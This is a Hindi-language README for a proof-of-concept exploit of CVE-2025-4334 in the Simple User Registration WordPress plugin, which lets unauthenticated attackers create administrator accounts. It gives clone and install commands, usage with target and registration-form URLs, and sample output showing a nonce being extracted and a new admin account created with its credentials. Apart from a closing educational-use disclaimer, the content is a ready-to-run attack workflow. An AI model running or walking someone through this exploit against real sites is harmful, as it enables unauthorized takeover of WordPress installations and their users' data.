
CVE-2025-4334 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, सिंपल यूज़र रजिस्ट्रेशन वर्डप्रेस प्लगइन (<= 6.3) में एक विशेषाधिकार वृद्धि भेद्यता, जो बिना प्रमाणीकरण के हमलावरों को व्यवस्थापक खाते बनाने की अनुमति देती है।
एक्सप्लॉइट शीर्षक: सिंपल यूज़र रजिस्ट्रेशन <= 6.3 – बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
लेखक: गौरव भट्टाचार्जी (0xgh057r3c0n)
CVE ID: CVE-2025-4334
यह एक्सप्लॉइट वर्डप्रेस के लिए सिंपल यूज़र रजिस्ट्रेशन प्लगइन (<= v6.3) में एक कमजोरी को लक्षित करता है, जो बिना प्रमाणीकृत हमलावरों को विशेषाधिकार बढ़ाने और एक नया व्यवस्थापक खाता बनाने की अनुमति देता है।
रिपॉजिटरी को क्लोन करें और आवश्यक Python निर्भरताएँ स्थापित करें:
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt
निर्भरताएँ:
requestscoloramapython3 CVE-2025-4334.py -u <base_url> --form <form_url>
तर्क:
-u / --url → बेस वर्डप्रेस URL (जैसे https://target.com/wordpress/)--form → रजिस्ट्रेशन फॉर्म का पूरा URL (जैसे https://target.com/wpr/default-registration/)उदाहरण:
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/
[*] फॉर्म विवरण प्राप्त किया जा रहा है...
[i] निकाला गया नॉन्स : 1a2b3c4d5e
[i] निकाला गया फॉर्म ID : 12
[i] रेफरर पथ : /wpr/default-registration/
[*] एक्सप्लॉइट पेलोड भेजा जा रहा है...
[i] HTTP प्रतिक्रिया कोड : 200
[i] सर्वर प्रतिक्रिया : {"success":true,"user_id":2}
[+] एक्सप्लॉइट सफल हुआ
[+] उपयोगकर्ता नाम : 0xgh057r3c0nadmin
[+] पहला नाम : 0xgh057r3c0nadmin
[+] अंतिम नाम : 0xgh057r3c0nadmin
[+] ईमेल : [email protected]
[+] पासवर्ड : Wiz007@8876@
[+] भूमिका : administrator
एक्सप्लॉइट द्वारा : गौरव भट्टाचार्जी (0xgh057r3c0n)
यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
अनधिकृत उपयोग या अनुमति के बिना सिस्टम के विरुद्ध उपयोग गैरकानूनी है।
लेखक किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंसीकृत है।